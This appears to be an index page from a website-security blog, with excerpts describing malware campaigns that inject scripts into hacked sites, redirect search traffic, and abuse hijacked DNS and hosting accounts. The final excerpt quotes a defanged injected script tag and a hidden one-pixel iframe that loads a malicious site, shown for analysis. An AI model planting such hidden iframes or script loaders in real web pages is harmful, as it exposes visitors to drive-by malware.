A couple of years ago I wrote about malware attacks that used the Twitter API to generate domain names for their malicious sites, using trending topics as keys in the domain generation algorithm.
Since 2009, I’ve seen many revisions of that attack. It has never been the most prevalent issue, but as far as I can tell it constantly evolves and mutates. The recent update of the malicious script injected by this attack looked quite interesting, and I decided to find out what has changed since late 2009.
Continue »»
During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:

A few days ago I tweeted that “this year the most popular TLD for malicious sites is .CC“. I conducted some research on the most prevalent attacks that use the .CC TLD and now want to elaborate on what is going on.
Continue »»
Today, I can see many blacklisted sites where Google reports one of the following three domains as the source of the problem:
E.g.
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
Continue »»
Two of the major trends in malware attacks described on this blog this summer were the use of hijacked DNS records of legitimate domains and continuous attacks against sites on MediaTemple and RackSpace. At the end of this September, I noticed a new attack that combined these two trends.
At a higher level, this attack is no different from many preceding variations that hit MediaTemple. It prepends malicious code to the first line of some existing .js files or injects it inside the <ads>…</ads> tags at the bottom of the HTML code of legitimate web pages.
However, you soon notice new techniques.
Continue »»
This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML
Continue »»
A few days ago I noticed a new mass infection of sites on RackSpace. It mostly affects WordPress blogs and sites hosted under the same account with WordPress blogs.
Hackers create malicious .js files in some subdirectory of the compromised sites and inject links to those .js files into website pages.
Continue »»
New week — new attack on MediaTemple-hosted sites.
Almost everything remains the same as in last week’s attack, which I described here. The only difference is the new script and the new remote malicious site – bl .pqshow .org.
Continue »»
Right before this weekend I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google, and their diagnostic pages mention the following five domains: “myads .name“, “adsnet .biz“, “toolbarcom .org“, “mybar .us“, “freead .name“.
Continue »»
Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:
Malicious software is hosted on 1 domain(s), including addthiss .net/.
Unmask Parasites didn’t detect anything suspicious, but a quick manual check revealed the following script tag right after the <body> tag in every web page:
<sc ript type="text/javascript" src="newgeocheck.js"></script>
(Unmask Parasites doesn’t check .js files, so no wonder it couldn’t detect the source of the problem.)
This script loaded an invisible iframe from addthiss .net.
<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>
Here goes the real investigation »»

Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.